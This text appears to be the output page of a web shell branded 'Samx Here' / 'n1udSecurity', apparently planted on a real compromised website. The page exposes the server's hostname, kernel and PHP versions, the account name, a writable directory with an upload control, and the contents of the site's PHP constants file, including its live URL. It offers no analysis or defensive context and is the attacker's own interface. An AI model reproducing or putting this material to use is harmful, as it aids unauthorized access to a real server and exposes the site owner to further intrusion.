Samx Here
n1udSecurity


Server : Apache
System : Linux ks5.tuic.fr 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64
User : pragmatice ( 1003)
PHP Version : 8.2.24
Disable Function : NONE
Directory :  /home/pragmatice/public_html/test/pragmacompte/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/pragmatice/public_html/test/pragmacompte/includes/constantes.php
<?php

define("NOM_SITE","PragmaCompte");
define("NOM_SITE_COLOR","<span style='color:#70A9F8; font-weight:bold;'>P</span>ragma<span style='color:#F5DB62; font-weight:bold;'>C</span>ompte");

if ($_SERVER["HTTP_HOST"] == 'localhost' || $_SERVER["HTTP_HOST"] == '127.0.0.1' ) {
    //URL du site en local
    define("URL_SITE","http://localhost/_new/pragmacompte/");
} else {
    //URL du site en ligne
    define("URL_SITE","https://pragmatice.net/test/pragmacompte/");
}

SAMX